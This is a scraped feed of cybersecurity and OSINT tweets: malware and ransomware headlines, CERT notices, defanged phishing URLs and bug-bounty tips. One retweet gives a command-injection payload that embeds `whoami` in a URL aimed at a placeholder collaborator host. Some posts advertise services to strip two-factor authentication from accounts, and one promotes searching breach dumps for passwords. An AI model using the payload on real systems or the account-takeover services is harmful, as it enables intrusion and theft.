TheDataEmbassy: RT @DataDynamicsInc: The #threat actors associated with the #Gootkit #malware have made notable changes to their toolset, adding new compon… -- TheDataEmbassy
UKikaski: APU Mi-24 mowing the grass... #OSINT #Ukraine #UkraineWar https://t.co/RDZzGEsSJc… https://t.co/Vozjmyb7EB -- UKikaski
UKikaski: APU Mi-24 mowing the grass... #OSINT #Ukraine #UkraineWar https://t.co/wOEY4q4T5E… https://t.co/38prELNIti -- UKikaski
certbe: Thank you for attending our last CCB Connect &amp; Share (QCTR) event! 💻😊 Want to take a look at the presentations again?  ➡️ https://t.co/744obccaz3.   📅 Save the date : April 20th.  See you next time! https://t.co/4B0ahoG36a -- certbe
CSIRTCV: La setmana vinent, @CSIRTCV visitarà els centres IES #Almenara IES Gabriel Ciscar en #Oliva e IES Ntra Sra de la Cueva Santa en #Montanejos per a impartir xarrades i tallers de #Conscienciació sobre #ciberseguretat als alumnes de 1r de l'ESO. Esp -- CSIRTCV
CSIRTCV: La próxima semana, @CSIRTCV visitará los centros IES #Almenara IES Gabriel Ciscar en #Oliva IES Ntra Sra de la Cueva Santa en #Montanejos para impartir charlas y talleres sobre #ciberseguridad a sus alumnos de 1º de la ESO ¡Esperamos que aprendái -- CSIRTCV
GovCERT_CH: In Svizzera ci sono ancora 660 server Microsoft Exchange vulnerabili, nonostante l’NCSC avesse già avvertito i gestori riguardo alla vulnerabilità critica chiamata «ProxyNotShell». #cibersicurezza #ciber https://t.co/dIsX7mG8n7 https://t.co/3 -- GovCERT_CH
GovCERT_CH: En Suisse, 660 serveurs Microsoft Exchange présentent encore une vulnérabilité critique appelée «ProxyNotShell», alors que le NCSC a publié une mise en garde contre cette faille de sécurité. #cybersécurité #cyber https://t.co/4wtZrwmkag https -- GovCERT_CH
GovCERT_CH: Noch immer sind 660 verwundbare Microsoft Exchange Server in der Schweiz verwundbar. Dies, obwohl das NCSC vor der kritischen Verwundbarkeit namens «ProxyNotShell» gewarnt hat. #cybersicherheit #cyber https://t.co/9WmabDrohi https://t.co/6HW9 -- GovCERT_CH
0x2nac0nda: RT @gonzxph: My first time RCE you can embed a link on your target program? try this one Payload: http://collaboratorlink(.)com?`whoami`… -- 0x2nac0nda
ADanielHill: RT @davidbombal: Ethical hacker jailed for doing good? YouTube video: https://t.co/uSO7myRRPZ #cyber #hack #hacking #hacker #cybercrime… -- ADanielHill
agrisols: #Fortinet Next-Generation Firewalls (#NGFWs) are designed to offload critical security and networking functions to… https://t.co/tl8FvO4EWW -- agrisols
ahmedabadmirror: Two US Canada Visa Fraudsters Nabbed, Extorted Rs 31 Lakh From 14 People #CanadaVisa #Canada #US #Cybercrime… https://t.co/nRDtjAss7N -- ahmedabadmirror
awkward_1110: RT @PalmOilDetect: #OSINT #investigation by @adinarenner @ConradinZ @BarJack finds that 'sustainable' #palmoil is not actually sustainable,… -- awkward_1110
beefyspace: RT @erickie007: Recon for bug bounty, penetration testers &amp; ethical hackers #cybersecurity #BugBounty #infosec #bugbountytips https://t.co… -- beefyspace
CorneliusMill15: RT @Fortinet: With #ransomware becoming more sophisticated and destructive each day, it's important to bring the discovery of an attack to… -- CorneliusMill15
CyberSecurityN8: RT @erickie007: Recon for bug bounty, penetration testers &amp; ethical hackers #cybersecurity #BugBounty #infosec #bugbountytips https://t.co… -- CyberSecurityN8
CyberSecurityN8: RT @hackinarticles: Information Security Concept #infosec #cybersecurity #cybersecuritytips #pentesting #oscp #redteam #informationsecurit… -- CyberSecurityN8
ecarlesi: Possible threat on hxxps://pt-akbar[.]pro/Files[.]zip #phishing #opendir #nc https://t.co/QwMbfw0fdc -- ecarlesi
ecosyst_: RT @erickie007: Recon for bug bounty, penetration testers &amp; ethical hackers #cybersecurity #BugBounty #infosec #bugbountytips https://t.co… -- ecosyst_
GhostWarBgm: RT @three_cube: Open Source Intelligence (OSINT): Finding Email Passwords in Dumps with h8mail #osint #h8mail #infosec #cybersecurity #cybe… -- GhostWarBgm
GutierrezMiren: New article: Making dispersed data a visual event. How scrappy data-based inquiry and #OSINT is employed by journal… https://t.co/3k9Zi6zPPc -- GutierrezMiren
HKBritFisheries: RT @lobsterlarryliu: 02.01, South China Sea, #USSNimitz CVN-68 aircraft carrier captured by satellite via @planet #OSINT https://t.co/yZ… -- HKBritFisheries
ICS_AG: In our opinion 'Hiding the situation from employees, partners, customers' is the worst, because you only get out of… https://t.co/2KZ0ZtdYu9 -- ICS_AG
jayeshmthakur: RT @Mr_Russianbot: Latest off the press: threatintel 📈 DarkWire cyber-social trending insights 📉 . #threatintel data feed here 👉https://t.c… -- jayeshmthakur
Joneshacksit: Send a dm now to remove Two factor authentication from any account, l'm always available 24/7 #logins #2fa… https://t.co/eHJjlFh2ww -- Joneshacksit
kinyywa: RT @SecurityTrybe: Cybersecurity Attack Vectors #infosecurity #cyberattacks #cyber #Hacked #Hacking #cybercrime https://t.co/WNSxCOlHT3 -- kinyywa
KMombani: This is not a case of #Cybercrime this is not even a case. This is a reality, the ppl of #Pakistan no more trust th… https://t.co/2wyLNHHG9z -- KMombani
LexisNexisES: The threat of #ransomware and top tips in the event of a #cybdersecurity breach - Listen to joint webinar with… https://t.co/HbUi8ch0XQ -- LexisNexisES
lindseylegacki: RT @anandeswaran: The countdown to @Veeam Backup &amp; Replication v12 continues. Please join our launch event and hear about major updates. Pl… -- lindseylegacki
munna0x1: RT @three_cube: Open Source Intelligence (OSINT): Finding Email Passwords in Dumps with h8mail #osint #h8mail #infosec #cybersecurity #cybe… -- munna0x1
NW52231773: RT @bad_packets: Yearly Top 10 Countries – 2022 Unique active DDoS botnet hosts detected: 🇨🇳 China: 285,785 🇮🇳 India: 51,270 🇹🇼 Taiwan: 36,… -- NW52231773
programmerjoke9: If Me.Job.Language = "VB" Then Me.Kill(now) End If#100Daysofcode #javascript #programming #dev #linux #java… https://t.co/hLs3yP5JkH -- programmerjoke9
rahul05ranjan: RT @programmerjoke9: If Me.Job.Language = "VB" Then Me.Kill(now) End If#100Daysofcode #javascript #programming #dev #linux #java #programmi… -- rahul05ranjan
RDSWEB: RT @lobsterlarryliu: 02.01, South China Sea, #USSNimitz CVN-68 aircraft carrier captured by satellite via @planet #OSINT https://t.co/lA… -- RDSWEB
RedPacketSec: Daily Vulnerability Trends: Thu Feb 02 2023 - https://t.co/q5g3c4qMvj #OSINT #ThreatIntel #CyberSecurity #Vulnerability -- RedPacketSec
rensmajor: RT @osintcombine: [#OSINT Tools] We've updated our bookmark stack to include important tools to conduct fact-checking &amp; verification, and o… -- rensmajor
sectest9: RT @ecarlesi: Possible threat on hxxps://pt-akbar[.]pro/Files[.]zip #phishing #opendir #nc https://t.co/QwMbfw0fdc -- sectest9
sectest9: RT @JKleijssen: After nearly 40 exiting years I have left @coe and look forward to new challenges as a #Consultant and #lecturer! #AI #Huma… -- sectest9
sectest9: RT @programmerjoke9: If Me.Job.Language = "VB" Then Me.Kill(now) End If#100Daysofcode #javascript #programming #dev #linux #java #programmi… -- sectest9
sectest9: RT @viehgroup: Top 10 web hacking techniques of 2022 - nominations open https://t.co/b5K7uaeReM #infosec #Bugbounty #bugbountytips #cyber… -- sectest9
sectest9: RT @SecurityTrybe: Cybersecurity Attack Vectors #infosecurity #cyberattacks #cyber #Hacked #Hacking #cybercrime https://t.co/WNSxCOlHT3 -- sectest9
SNFLaboratory: RT @ido_cohen2: 🌐#Ransomware Groups Statistics January 2023: - Lockbit: 51 - Vice: 21 - BlackCat: 20 - Royal: 20 - Play: 10 - Avos: 7 -Ma… -- SNFLaboratory
SteveSchofield: RT @DailyOsint: If you need a fast and effective port scanner, You can try #RustScan, which is able to scan all ports in 3 seconds. https… -- SteveSchofield
viehgroup: Top 10 web hacking techniques of 2022 - nominations open https://t.co/b5K7uaeReM #infosec #Bugbounty… https://t.co/xl9u2Kp0kQ -- viehgroup
warmatters: RT @press4change: #OSINT The 1st 10 yrs of the Syrian civil war produced video footage running to 40 yrs, notes Matthew Ford [@warmatters]… -- warmatters
X_fklimczak: RT @three_cube: Open Source Intelligence (OSINT): Finding Email Passwords in Dumps with h8mail #osint #h8mail #infosec #cybersecurity #cybe… -- X_fklimczak
B1nary0wl: RT @re_and_more: RE tip of the day: While in x86 the same instruction MOV can be used to move the data between two registers, registers and… -- B1nary0wl
carlesdijous: New APT34 Malware Targets The #MiddleEast. We analyze an infection campaign targeting organizations in the Middle E… https://t.co/e9xqOULuAx -- carlesdijous
CERTAzerbaijan: "Gmail" hesablarınızda ikimərhələli identifikasiyanı aktivləşdirməklə hesablarınızın mühafizəsini təmin edə bilərsiniz. #ETX #certaz #kibertəhlükəsizlik #cybersecurity #gmail https://t.co/0l0WYOsFHp -- CERTAzerbaijan
certbe: GitHub Desktop v3.0.2-3.1.2 or Atom v1.63.0-1.63.1 users, take the following steps to keep your software working on the 2nd of February 2023: https://t.co/gOldJFgAo0 -- certbe
CSIRTCV: Coneixes el Pla de xoc de #ciberseguretat per a Entitats Locals valencianes (EELL)? Informa't ací: https://t.co/4sWtRqdyDc https://t.co/ZrxPu9vCAc -- CSIRTCV
CSIRTCV: ¿Conoces el Plan de choque de #ciberseguridad para Entidades Locales valencianas (EELL)? Infórmate aquí: https://t.co/4sWtRqdyDc https://t.co/C0NOqWb5uA -- CSIRTCV
CyberSecurityN8: RT @Ax_Sharma: This week @AlexisConran &amp; I go over Browser in the Browser (BitB) attack technique—that's used in convincing #phishing scams… -- CyberSecurityN8
CyberSecurityN8: RT @CatcherPhishing: 🎣Potential Phishing URL: hxxps[://]business-meta-appeal-146-92866[.]firebaseapp[.]com/ 📌Target Domain: facebook[.]com… -- CyberSecurityN8
ecarlesi: Threat on hxxps://walletefex[.]xyz/connect/walletconnect[.]com/accordion[.]html #phishing #walletconnect -- ecarlesi
ecarlesi: Threat on hxxps://walletefex[.]xyz/connect/walletconnect[.]com/index[.]html #phishing #walletconnect -- ecarlesi
fe_tsoc: RT @CatcherPhishing: 🎣Potential Phishing URL: hxxps[://]business-meta-appeal-146-92866[.]firebaseapp[.]com/ 📌Target Domain: facebook[.]com… -- fe_tsoc
Good__Bear: Phishing PayPal https[:]//verificationppl[.]fr #phishing -- Good__Bear
ICS_AG: RT @RtHackersNews: 🚨 ALERT: Gaming &amp; gambling industry is under attack! Hackers are using sneaky social engineering tactics ahead of ICE L… -- ICS_AG
ignoringsignals: I've just received such a good #phishing email. Coming right from #PayPal (PayPal itself didn't do anything wrong) https://t.co/373LMvssok -- ignoringsignals
iSecurity: iSecurity New GOOTLOADER Malware Uses Fileless Technique to Deploy Ransomware https://t.co/ukPR4UKYgz… https://t.co/je4LrlXVqK -- iSecurity
jayeshmthakur: RT @HackwithNichola: Forgot your password for your social network, google or any active account? Send a message to us going to recovery. #… -- jayeshmthakur
jayeshmthakur: RT @HackwithNichola: Forgot your password for your social network, google or any active account? Send a message to us going to recovery. #… -- jayeshmthakur
jayeshmthakur: RT @Joneshacksit: Forgot your password for your social network, google or any active account? Send a message to us going to recovery, #hac… -- jayeshmthakur
noladefense: #phishing Website Detected #infosec #cybersecurity #scam #フィッシング詐欺 #偽サイト URL: hxxps://id[.]smbcc-businessclub[.]jp… https://t.co/YDfRDDO0PA -- noladefense
prateekpsinha: RT @db_digest: Data-Leaking Ransomware Report - January 2023 https://t.co/y92jEygu2q #databreach #databreaches #databreachesdigest #datapri… -- prateekpsinha
sectest9: RT @ignoringsignals: I've just received such a good #phishing email. Coming right from #PayPal (PayPal itself didn't do anything wrong) h… -- sectest9
Technic39286800: RT @TheHackersNews: 🚨 ALERT: Gaming &amp; gambling industry is under attack! Hackers are using sneaky social engineering tactics ahead of ICE… -- Technic39286800
threat_404: RT @Hackwithmark: For #Hacked #Gmail recovery Dm now #Hackedgmail #CyberSecurity #hacker #infosec @reach2ratan #security #cyber #tech #open… -- threat_404
1amkaizen: simple tools for port-scanner https://t.co/Exmq5ZGnss #bugbounty #bugbountytips #hacking #cybersecurity… https://t.co/EQ6CbckRjU -- 1amkaizen
1amkaizen: simple tools for automation ffuf and wfuzz https://t.co/nTyFMqqQFI #bugbountyi #bugbountytips #cybersecurity… https://t.co/4UDpQknPIh -- 1amkaizen
AdibatlaPS: RT @RachakondaCop: Today @sheteams_rck of Ibrahimpatnam division conducted an #awareness program about #SheTeams, #CyberCrime, #HumanTraffi… -- AdibatlaPS
aidamohdhanif24: RT @viehgroup: Geolocating Terrorists With ChatGPT https://t.co/d37JA9JXod #infosec #bugbounty #bugbountytips #hacking #hacker #ethicalh… -- aidamohdhanif24
allaboutclait: LockBit ransomware goes 'Green,' uses new Conti-based encryptor https://t.co/8XUYxsJrMu #infosec #Ransomware -- allaboutclait
AtomSpam: Detected #phishing clone at address: hxxp://www[.]pinakidigital[.]com/office/ #microsoft #infosec #cybersecurity… https://t.co/GFyHGxVIay -- AtomSpam
AtomSpam: Detected #phishing clone at address: hxxp://www[.]simeona[.]ml/Admin/ #microsoft #infosec #cybersecurity #atomspam… https://t.co/M1wQUqOiLV -- AtomSpam
BadrUAE: #Cybersecurity organizations fight back against rise of #emotet and #omnatuor #malvertising https://t.co/RvZsIco9xL -- BadrUAE
balaji581579: RT @SecurityTrybe: Cybersecurity Attack Vectors #infosecurity #cyberattacks #cyber #Hacked #Hacking #cybercrime https://t.co/WNSxCOlHT3 -- balaji581579
balaji581579: RT @hackinarticles: Cyber Security Mindmap #infosec #cybersecurity #cybersecuritytips #pentesting #oscp #redteam #informationsecurity #cis… -- balaji581579
bamfuzo: watu wana-over-share sana kwa social media. its crazy how much info you can get about someone from online. #OSINT -- bamfuzo
beefyspace: RT @JinibaBD: 👀👁️5 Cyberattacks You Should Prepare for in 2023 #Phishing #ransomware #cyberattacks #privacy #cyberintelligence #infosec #cy… -- beefyspace
beefyspace: RT @ecarlesi: Possible threat on hxxps://nimpromo[.]com/mobileapp_api[.]zip #phishing #opendir #cloudflare -- beefyspace
council_cyber: RT @three_cube: Open Source Intelligence (OSINT): Finding Email Passwords in Dumps with h8mail #osint #h8mail #infosec #cybersecurity #cybe… -- council_cyber
council_cyber: RT @BadrUAE: #Cybersecurity organizations fight back against rise of #emotet and #omnatuor #malvertising https://t.co/RvZsIco9xL -- council_cyber
CyberDFIR: RT @javier_carriazo: Command-Injection Bug in Cisco Industrial Gear Opens Devices to Complete Takeover #Phishing #ransomware #cyberattacks… -- CyberDFIR
CyberDFIR: RT @JinibaBD: 👀👁️5 Cyberattacks You Should Prepare for in 2023 #Phishing #ransomware #cyberattacks #privacy #cyberintelligence #infosec #cy… -- CyberDFIR
CyberDFIR: RT @javier_carriazo: 🚨👁️🚨 #Microsoft: We are tracking these 100 active ransomware gangs using 50 types of malware #Phishing #ransomware #cy… -- CyberDFIR
CyberDFIR: RT @JinibaBD: You can always help #cyberwar in #ukraina with #OSINT and deliver good #Intelligence to good people #Threatintel #threatintel… -- CyberDFIR
CyberDFIR: RT @HackwithNichola: Do you want to build a website with special features that can process everything, find no more. Contact us now. #inst… -- CyberDFIR
CyberDFIR: RT @JinibaBD: 🚨⚠️⚠️⚠️🚨Romance Scams‼️⛔️⛔️‼️#Phishing #ransomware #cyberattacks #privacy #cyberintelligence #infosec #cybersec #cybersecurit… -- CyberDFIR
CyberDFIR: RT @JinibaBD: #=SINT is key to #preventbreachstrategy. Learn how to protect #criticalinfrastructure #Phishing #ransomware #cyberattacks #p… -- CyberDFIR
CyberSecurityN8: RT @DailyOsint: If you need a fast and effective port scanner, You can try #RustScan, which is able to scan all ports in 3 seconds. https… -- CyberSecurityN8
CyberSecurityN8: RT @HarrietMRitter1: Steps for DM on Twitter https://t.co/c3k3NqCDvU #cybersecurity #kalilinux #pentesting #ethicalhacker #linux #malware… -- CyberSecurityN8
CyberSecurityN8: RT @1amkaizen: simple tools for port-scanner https://t.co/Exmq5ZGnss #bugbounty #bugbountytips #hacking #cybersecurity #ethicalhacking #… -- CyberSecurityN8
cybsecbot: In the past 24 hours, 899 IoC's were submitted and #QakBot is the most seen #malware family on abuse[.]ch -- cybsecbot
decillionairs: RT @three_cube: Open Source Intelligence (OSINT): Finding Email Passwords in Dumps with h8mail #osint #h8mail #infosec #cybersecurity #cybe… -- decillionairs
ecarlesi: Possible threat on hxxps://chronopost-relivraison[.]fr #phishing https://t.co/pRRPLXanDa -- ecarlesi
ecarlesi: Possible threat on hxxps://nimpromo[.]com/mobileapp_api[.]zip #phishing #opendir #cloudflare -- ecarlesi
HarrietMRitter1: Steps for DM on Twitter https://t.co/c3k3NqCDvU #cybersecurity #kalilinux #pentesting #ethicalhacker #linux… https://t.co/8WcV36aJN2 -- HarrietMRitter1
iedufp: RT @three_cube: Open Source Intelligence (OSINT): Finding Email Passwords in Dumps with h8mail #osint #h8mail #infosec #cybersecurity #cybe… -- iedufp
iSecurity: Threat Detection https://t.co/x3LOA45rcN #cybersecurity #threatintelligence #tryhackme -- iSecurity
Jean73928802: RT @Robert4787: This case is an example of how the #CIA and #FBI work continuously to hunt down threats to their operations, but as #spies… -- Jean73928802
KillerP4nd4: RT @S2W_Official: Chinese threat actor, Teng Snake (a.k.a CodeCore | APT-C-61) Recently, collaborated with Russian hackers. https://t.co/R… -- KillerP4nd4
NCSVenturesCorp: China imposes new cybersecurity rules in Tibet — Radio Free Asia | #hacking | #cybersecurity | #infosec | #comptia… https://t.co/Gg0PdUQYBp -- NCSVenturesCorp
peter_profess: RT @DailyOsint: If you need a fast and effective port scanner, You can try #RustScan, which is able to scan all ports in 3 seconds. https… -- peter_profess
pingineer_jp: hxxps://onlineservices-mygov[.]org/ret/secure #Phishing #scam #mygov #taxreturn #AustraliaGov -- pingineer_jp
prince_mohaaa: RT @programmerjoke9: Cobol is literally just English#100Daysofcode #javascript #programming #dev #linux #java #programming #CodeNewbie #pyt… -- prince_mohaaa
programmerjoke9: Came across this job#100Daysofcode #javascript #programming #dev #linux #java #programming #CodeNewbie #python… https://t.co/tqzuT3aAFW -- programmerjoke9
ProxyQtr5: RT @DailyOsint: If you need a fast and effective port scanner, You can try #RustScan, which is able to scan all ports in 3 seconds. https… -- ProxyQtr5
rahul05ranjan: RT @HarrietMRitter1: Steps for DM on Twitter https://t.co/c3k3NqCDvU #cybersecurity #kalilinux #pentesting #ethicalhacker #linux #malware… -- rahul05ranjan
rahul05ranjan: RT @programmerjoke9: Came across this job#100Daysofcode #javascript #programming #dev #linux #java #programming #CodeNewbie #python #reactj… -- rahul05ranjan
rahul05ranjan: RT @1amkaizen: simple tools for port-scanner https://t.co/Exmq5ZGnss #bugbounty #bugbountytips #hacking #cybersecurity #ethicalhacking #… -- rahul05ranjan
rahul05ranjan: RT @1amkaizen: simple tools for automation ffuf and wfuzz https://t.co/nTyFMqqQFI #bugbountyi #bugbountytips #cybersecurity #ethicalhack… -- rahul05ranjan
Riisteri: RT @Robert4787: This case is an example of how the #CIA and #FBI work continuously to hunt down threats to their operations, but as #spies… -- Riisteri
RuOilTracker: 🇷🇺-&gt;🇳🇱 MINERVA LYDIA Departed Taman with 40,000 tons of oil products for delivery in #Rotterdam, #Netherlands… https://t.co/u50sPavdW6 -- RuOilTracker
samrickie_: RT @DailyOsint: If you need a fast and effective port scanner, You can try #RustScan, which is able to scan all ports in 3 seconds. https… -- samrickie_
sectest9: RT @viehgroup: Geolocating Terrorists With ChatGPT https://t.co/d37JA9JXod #infosec #bugbounty #bugbountytips #hacking #hacker #ethicalh… -- sectest9
sectest9: RT @JinibaBD: 👀👁️5 Cyberattacks You Should Prepare for in 2023 #Phishing #ransomware #cyberattacks #privacy #cyberintelligence #infosec #cy… -- sectest9
sectest9: RT @1amkaizen: simple tools for port-scanner https://t.co/Exmq5ZGnss #bugbounty #bugbountytips #hacking #cybersecurity #ethicalhacking #… -- sectest9
sectest9: RT @viehgroup: Latest Nuclei Release Bugfix release (target skipping)! https://t.co/4q8Rg0L7Ds #infosec #Bugbounty #bugbountytips #cybers… -- sectest9
stem_nastics: RT @TheHackersNews: Think your EDR and #antivirus have got you covered? Think again! Researchers have uncovered a shellcode-based packer s… -- stem_nastics
thepixeldevs: RT @RedFox_App: We can detect fake apps &amp; prevent their installation in advance!⚠️ Visit: https://t.co/3YFvOr5gv6 #cybersecurity #privacy… -- thepixeldevs
thepixeldevs: RT @programmerjoke9: Cobol is literally just English#100Daysofcode #javascript #programming #dev #linux #java #programming #CodeNewbie #pyt… -- thepixeldevs
timothymayor24: RT @cyb_detective: StegoIntelligence List of tools for finding hidden data stored in images, audio recordings and text files. https://t.c… -- timothymayor24
_PTLB: #Malware Are Big Nuisance For Business Houses And Individuals World Over Warned @P4LOIndia And Visionary… https://t.co/RiINuO31cp -- _PTLB
AntonioMinnella: New #HeadCrab #malware infects 1,200 #Redis servers to mine #Monero https://t.co/X7JnbMQljy #cybersecurity -- AntonioMinnella
council_cyber: RT @HarrietMRitter1: Steps for DM on Twitter https://t.co/c3k3NqCDvU #cybersecurity #kalilinux #pentesting #ethicalhacker #linux #malware… -- council_cyber
iSecurity: "Need action! Withdrawing Funds id" containing google drive spreadsheet with macro, accidentally opened on Android… https://t.co/39HPqdCRUR -- iSecurity
jpcert: 「ICS脆弱性分析レポート ー2022年度上期ー」を公開。当該期間に公表された制御システム関連製品の脆弱性情報の中からWebインタフェースの脆弱性に注目し、解説しています。^YK https://t.co/lL8IDjwPCB https://t.co/H3DDgtYDh1 -- jpcert
sectest9: RT @HarrietMRitter1: Steps for DM on Twitter https://t.co/c3k3NqCDvU #cybersecurity #kalilinux #pentesting #ethicalhacker #linux #malware… -- sectest9
_imvibek: RT @Hammad7361: After alot of duplicates I was awarded my first bounty of 2023 on @Bugcrowd #ItTakesACrowd #BugBounty https://t.co/sbp1DxHG… -- _imvibek
_ProtocolPolice: #osint #nautical #ships what is the purpose of the horizontal beam? - point at end, wheels for cable https://t.co/jYzYTY1dUh -- _ProtocolPolice
CyberSecurityN8: RT @RootxRavi: Just scored a 4 Digit Bounty on @YogoshaOfficial 1 : Get all the URL from wayback / Gau 2 : Filter out the js file using… -- CyberSecurityN8
CyberSecurityN8: RT @hackinarticles: Sqlmap Mindmap @sqlmap https://t.co/iPX3NihtbD #infosec #cybersecurity #cybersecuritytips #pentesting #oscp #redtea… -- CyberSecurityN8
CyberSecurityN8: RT @threatshub: ThreatsHub Cybersecurity News | Monthly Threat Webinar Series in 2023: What to Expect - https://t.co/QK8EL5kOmD #CyberSecur… -- CyberSecurityN8
CyberSecurityN8: RT @three_cube: Open Source Intelligence (OSINT): Finding Email Passwords in Dumps with h8mail #osint #h8mail #infosec #cybersecurity #cybe… -- CyberSecurityN8
ecarlesi: Threat on hxxps://muslash[.]online/Site[.]zip #phishing #opendir #hostinger https://t.co/BB3by4MJm7 -- ecarlesi
ecarlesi: Possible threat on hxxps://reynolsquaresad[.]buzz/firstbanktexas[.]zip #phishing #opendir -- ecarlesi
ecarlesi: Possible threat on hxxps://mycss[.]site/3435214css11123[.]zip #phishing #opendir https://t.co/3YDDOe7ieu -- ecarlesi
ecarlesi: Possible threat on hxxps://benorchardww[.]buzz/ROYALCU[.]zip #phishing #opendir https://t.co/rnVYpzuAKd -- ecarlesi
EncryptMyEmails: RT @J2johnMc: The #data suggests that what @J2SoftwareSA speaks about is correct - 93% of #response is due to #cybercrime with criminal gan… -- EncryptMyEmails
Gavri4IL: I already knew about the #cyber and #intelligence #ThreatIntelligence sharing between 🇺🇸 🇨🇦 so I knew I could spare us ALL 🌏🌎🌍 -- Gavri4IL
gdprAI: RT @threatshub: ThreatsHub Cybersecurity News | Google boosts bounties for open source flaws found via fuzzing - https://t.co/f5I2qMJJyq #C… -- gdprAI
gdprAI: RT @opsmatters_uk: The latest update for #Trustwave includes "The Genesis of Trustwave's Advanced Continual Threat Hunt" and "Trustwave's R… -- gdprAI
hsakarp_ilajna: I was awarded 0.135 ETH bounty! #bugbounty #infosec #hacking https://t.co/AXZ9kG6v29 -- hsakarp_ilajna
iamShOrTy420: RT @hackinarticles: Sqlmap Mindmap @sqlmap https://t.co/iPX3NihtbD #infosec #cybersecurity #cybersecuritytips #pentesting #oscp #redtea… -- iamShOrTy420
juanmasktr: RT @DailyOsint: If you need a fast and effective port scanner, You can try #RustScan, which is able to scan all ports in 3 seconds. https… -- juanmasktr
kuroOowannafly: RT @RootxRavi: Just scored a 4 Digit Bounty on @YogoshaOfficial 1 : Get all the URL from wayback / Gau 2 : Filter out the js file using… -- kuroOowannafly
manishfoodtechs: RT @DailyOsint: If you need a fast and effective port scanner, You can try #RustScan, which is able to scan all ports in 3 seconds. https… -- manishfoodtechs
mbalchaitis: RT @SonicWall: SonicWall teamed up with Osterman Research to provide the current content of #ransomware with best practices, areas of #vuln… -- mbalchaitis
MrHacke01443999: RT @viehgroup: Testing account takeover vulnerabilities #bugbounty #bugbountytips #cybersecurity #pentesting #hacking https://t.co/LZngz4c… -- MrHacke01443999
Nblackthorne: RT @sharonL33940258: Information specialists are behind a plot of revenge. Who are they? What do they want? To what lengths are they willi… -- Nblackthorne
opsmatters_uk: The latest update for #CrowdStrike includes "Using ArtificialIntelligence and MachineLearning to Combat Hands-on-Ke… https://t.co/HZqSGXQeca -- opsmatters_uk
opsmatters_uk: The latest update for #Trustwave includes "The Genesis of Trustwave's Advanced Continual Threat Hunt" and "Trustwav… https://t.co/hFtrt1PbLA -- opsmatters_uk
programmerjoke9: I’m currently learning Java, and I thought of this#100Daysofcode #javascript #programming #dev #linux #java… https://t.co/VuU6YQwZo0 -- programmerjoke9
rahul05ranjan: RT @programmerjoke9: I’m currently learning Java, and I thought of this#100Daysofcode #javascript #programming #dev #linux #java #programmi… -- rahul05ranjan
sectest9: RT @J2johnMc: The #data suggests that what @J2SoftwareSA speaks about is correct - 93% of #response is due to #cybercrime with criminal gan… -- sectest9
sectest9: RT @intigriti: Plenty of game hacking #bugbounty programs these days 👀 Time to learn the basics? Let's start with Cheat Engine 🎮 https://… -- sectest9
sectest9: RT @soumitraboseTOI: #BlackCat or #alphv #Hackers made #Ransomware attack in #Nagpur and stole details of #India's ammunition, rocket, mine… -- sectest9
sharonL33940258: Information specialists are behind a plot of revenge. Who are they? What do they want? To what lengths are they wi… https://t.co/2zOnGs3VMe -- sharonL33940258
ssinghrathore1: RT @soumitraboseTOI: #BlackCat or #alphv #Hackers made #Ransomware attack in #Nagpur and stole details of #India's ammunition, rocket, mine… -- ssinghrathore1
threat_404: RT @NCSVenturesCorp: Nantucket Public Schools to close following ransomware attack – Boston News, Weather, Sports | #hacking | #cybersecuri… -- threat_404
threatshub: ThreatsHub Cybersecurity News | Monthly Threat Webinar Series in 2023: What to Expect - https://t.co/QK8EL5kOmD… https://t.co/frt5j19B9V -- threatshub
YourAnonRiots: RT @three_cube: Open Source Intelligence (OSINT): Finding Email Passwords in Dumps with h8mail #osint #h8mail #infosec #cybersecurity #cybe… -- YourAnonRiots
YourAnonRiots: RT @barbbyofficial: A police officer is chasing a hacker He loses track of him in the streets and asks a passerby: -Where is he,where is t… -- YourAnonRiots
YourAnonRiots: RT @Cyberknow20: #alphv #Ransomware gang has posted Soto Consulting Engineers - an #Australian company who have delivered some of the count… -- YourAnonRiots
AtomSpam: Detected #phishing clone at address: hxxps://pxlme[.]me/P1Kkn_4s #metamask #crypto #infosec #cybersecurity… https://t.co/P2JQe52Ckm -- AtomSpam
AtomSpam: Detected #phishing clone at address: hxxps://metamaskz[.]cc/ #metamask #crypto #infosec #cybersecurity #atomspam… https://t.co/21f1hLU79C -- AtomSpam
AviationISAC: Yesterday, the last @Boeing 747 landed at @CVGairport. @AtlasAirWW was the last customer dedicating a special route along the way. We are proud to have three Aviation ISAC members involved in this historic moment. https://t.co/uEIJc4BxFK #qu -- AviationISAC
b_desikamani: Coming February 8—#Ransomware attacks are evolving and growing in sophistication. Our own Aaron Mulgrew will share… https://t.co/VSAmDzwU1b -- b_desikamani
beefyspace: RT @noladefense: #phishing Website Detected #infosec #cybersecurity #scam #フィッシング詐欺 #偽サイト URL: hxxps://determined-clarke[.]34-134-130-193[… -- beefyspace
beefyspace: RT @threatshub: ThreatsHub Cybersecurity News | Monthly Threat Webinar Series in 2023: What to Expect - https://t.co/QK8EL5kOmD #CyberSecur… -- beefyspace
CyberGovAU: 🖥️🎁 Did your child get a new laptop for the 2023 school year? Setting up their device properly is the best way to keep it secure &amp; reduce the risk of being targeted by a cybercriminal. Check out our new Kids Cyber Security Checklist to lea -- CyberGovAU
CyberGuardNews: New Report Reveals NikoWiper #malware That Targeted Ukraine Energy Sector https://t.co/HIJMfAhbbv #Sec_Cyber -- CyberGuardNews
CyberGuardNews: Ukrainian organisations getting hit by destructive new SwiftSlicer #malware https://t.co/PupL4SoqLt #Sec_Cyber -- CyberGuardNews
CyberSecurityN8: RT @noladefense: #phishing Website Detected #infosec #cybersecurity #scam #フィッシング詐欺 #偽サイト URL: hxxps://phpstack-930414-3229089[.]cloudways… -- CyberSecurityN8
CyberSecurityN8: RT @SonicWall: SonicWall Real-Time Deep Memory Inspection (#RTDMI) technology found more never-before-seen #malware than ever before. Get a… -- CyberSecurityN8
CyberSecurityN8: RT @TheHackersNews: Prilex POS #malware has evolved to block contactless payments and force victims to use physical cards for transactions… -- CyberSecurityN8
FSISAC: Join FS-ISAC in Singapore for the APAC Summit this July and spend two days showcasing your products, services and people at one of the most respected information and cyber security events in the region - the call for presentations is open: https:/ -- FSISAC
Gato_FA: RT @NandanLohitaksh: 18 Threat Hunting and OSINT Tools 🔥 1. https://t.co/PIptJzaOSj - Search for devices connected to the internet and the… -- Gato_FA
Hacker0891: RT @CyberGuardNews: New Report Reveals NikoWiper #malware That Targeted Ukraine Energy Sector https://t.co/HIJMfAhbbv #Sec_Cyber -- Hacker0891
